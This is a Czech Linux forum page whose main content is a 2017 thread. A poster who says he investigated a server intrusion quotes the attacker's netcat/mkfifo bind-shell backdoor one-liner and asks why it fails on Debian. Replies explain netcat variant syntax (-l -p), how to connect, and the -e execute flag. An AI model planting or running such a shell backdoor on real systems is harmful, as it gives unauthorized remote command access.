abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 16:11 | Nová verze

    Bylo vydáno openSUSE Leap 16 (cs). Ve výchozím nastavení přichází s vypnutou 32bitovou (ia32) podporou. Uživatelům však poskytuje možnost ji ručně povolit a užívat si tak hraní her ve Steamu, který stále závisí na 32bitových knihovnách. Změnily se požadavky na hardware. Leap 16 nyní vyžaduje jako minimální úroveň architektury procesoru x86-64-v2, což obecně znamená procesory zakoupené v roce 2008 nebo později. Uživatelé se starším hardwarem mohou migrovat na Slowroll nebo Tumbleweed.

    Ladislav Hagara | Komentářů: 0
    dnes 16:00 | IT novinky

    Ministerstvo průmyslu a obchodu (MPO) ve spolupráci s Národní rozvojovou investiční (NRI) připravuje nový investiční nástroj zaměřený na podporu špičkových technologií – DeepTech fond. Jeho cílem je posílit inovační ekosystém české ekonomiky, rozvíjet projekty s vysokou přidanou hodnotou, podpořit vznik nových technologických lídrů a postupně zařadit Českou republiku mezi země s nejvyspělejší technologickou základnou.

    … více »
    Ladislav Hagara | Komentářů: 0
    dnes 12:55 | Nová verze

    Radicle byl vydán ve verzi 1.5.0 s kódovým jménem Hibiscus. Jedná se o distribuovanou alternativu k softwarům pro spolupráci jako např. GitLab.

    Ladislav Hagara | Komentářů: 2
    dnes 03:22 | IT novinky

    Společnost OpenAI představila text-to-video AI model Sora 2 pro generování realistických videí z textového popisu. Přesnější, realističtější a lépe ovladatelný než předchozí modely. Nabízí také synchronizované dialogy a zvukové efekty.

    Ladislav Hagara | Komentářů: 4
    včera 23:11 | Nová verze

    UBports, nadace a komunita kolem Ubuntu pro telefony a tablety Ubuntu Touch, vydala Ubuntu Touch 24.04-1.0, tj. první stabilní vydání založené na Ubuntu 24.04 LTS.

    Ladislav Hagara | Komentářů: 0
    včera 21:00 | Komunita

    Rakouská armáda přechází na LibreOffice. Ne kvůli licencím (16 000 počítačů). Hlavním důvodem je digitální suverenita. Prezentace v pdf z LibreOffice Conference 2025.

    Ladislav Hagara | Komentářů: 23
    včera 12:44 | Bezpečnostní upozornění

    Národní úřad pro kybernetickou a informační bezpečnost (NÚKIB) upozorňuje na sérii kritických zranitelností v Cisco Adaptive Security Appliance (ASA) a Firepower Threat Defense (FTD) a Cisco IOS, CVE-2025-20333, CVE-2025-20363 a CVE-2025-20362. Zneužití těchto zranitelností může umožnit vzdálenému neautentizovanému útočníkovi spustit libovolný kód (RCE). Společnost Cisco uvedla, že si je vědoma aktivního zneužívání těchto zranitelností.

    Ladislav Hagara | Komentářů: 16
    včera 12:11 | IT novinky

    Ochrana uživatelů a zároveň příznivé podmínky pro rozvoj umělé inteligence (AI). Ministerstvo průmyslu a obchodu (MPO) připravilo minimalistický návrh implementace evropského nařízení o umělé inteligenci, tzv. AI aktu. Český zákon zajišťuje ochranu občanům a bezpečné používání AI, ale zároveň vytváří pro-inovační prostředí, ve kterém se může AI naplno rozvíjet, firmy mohou využít jeho potenciál a nebudou zatíženy zbytečnou administrativou. Návrh je nyní v meziresortním připomínkovém řízení.

    Ladislav Hagara | Komentářů: 8
    včera 05:11 | Komunita

    Dle plánu Linus Torvalds odstranil souborový systém bcachefs z mainline Linuxu. Tvůrce bcachefs Kent Overstreet na Patreonu informuje, že bcachefs je nově distribuován jako DKMS modul.

    Ladislav Hagara | Komentářů: 2
    29.9. 17:44 | IT novinky

    PIF, Silver Lake a Affinity Partners kupují videoherní společnost Electronic Arts (EA) za 55 miliard dolarů (1,14 bilionu korun).

    Ladislav Hagara | Komentářů: 2
    Jaké řešení používáte k vývoji / práci?
     (39%)
     (48%)
     (12%)
     (14%)
     (17%)
     (14%)
     (18%)
     (14%)
     (14%)
    Celkem 146 hlasů
     Komentářů: 9, poslední 24.9. 17:28
    Rozcestník

    Dotaz: netcat a zadní vrátka

    30.3.2017 17:07 Karel Marhoul
    netcat a zadní vrátka
    Přečteno: 477×
    Zdravím,

    nedávno jsem vyšetřoval hackerský průnik na jeden starší linuxový server. Zaujal mě způsob, jakým si útočník pod neprivilegovaným uživatelem otevřel zadní vrátka - shell, na portu 1234:
    rm -f /tmp/f
    mkfifo /tmp/f
    cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
    
    Když jsem však totéž nyní zkoušel na svém Debian Stable serveru, příkaz se chová tak, že netcat otevře náhodný vysoký port (místo portu 1234):
    kmarhoul@debian:~$ netstat  -nlpt
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 0.0.0.0:48705           0.0.0.0:*               LISTEN      12546/nc        
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
    tcp        0      0 0.0.0.0:48886           0.0.0.0:*               LISTEN      -               
    tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
    tcp6       0      0 :::443                  :::*                    LISTEN      -               
    tcp6       0      0 :::43168                :::*                    LISTEN      -               
    tcp6       0      0 :::111                  :::*                    LISTEN      -               
    tcp6       0      0 :::80                   :::*                    LISTEN      -               
    tcp6       0      0 :::22                   :::*                    LISTEN      -               
    tcp6       0      0 ::1:25                  :::*                    LISTEN      -     
    
    A po vzdáleném připojení na tento port výše uvedené havaruje a shell nedostanu:
    kmarhoul@debian:~$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
    invalid connection to [85.255.X.X] from (UNKNOWN) [95.82.X.X] 27619
    
    Zkoušel jsem to ještě na jiném serveru (také Debian Jessie) a stejné chování, přitom na kompromitovaném serveru to prošlo. Nevíte prosím někdo, čím to může být?

    Odpovědi

    pepe_ avatar 30.3.2017 17:41 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Není to podle verze  ? netcat-traditional , netcat-openbsd , netcat6 pak v novějších verzích třeba je nutné zadávat parametry -p 1234  místo   bez portu.. něco z toho bude pravda podle mne.
    30.3.2017 20:56 marian34
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Neodpoviem, ale sa spýtam ako si sa vzdialene pripojil na ten port?
    30.3.2017 21:07 mhepp
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Prvně předpokládám, že localhost je pouze pro ilustraci příkazu, ne reálná adresa. Potom připojení je jednoduché:

    telnet IP.AD.RE.SA 1234
    30.3.2017 21:56 marian34
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    ok, dík, ale skôr

    netcat host port
    30.3.2017 22:00 marian34
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    U mňa funkčné
    ~$ netcat -h
    OpenBSD netcat (Debian patchlevel 1.89-4ubuntu1)
    This is nc from the netcat-openbsd package. An alternative nc is available
    in the netcat-traditional package.
    30.3.2017 22:52 Michal Kubeček | skóre: 71 | Luštěnice
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    U openbsd netcatu je syntaxe pro listening "netcat -l 1234", ale u některých jiných verzí "netcat -l -p 1234".
    2.4.2017 00:16 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Jj netcat používá "-l ... -p" pro server a nic pro klienta.
    30.3.2017 22:50 Michal Kubeček | skóre: 71 | Luštěnice
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    To je dost předčasná otázka v okamžiku, kdy má tazatel problém s tím, že mu ani ten listening socket neposlouchá na požadovaném portu.
    2.4.2017 00:18 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Teda ale slabý útočník. Mělo by stačit použít přepínač -e (jako execute) :-D.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.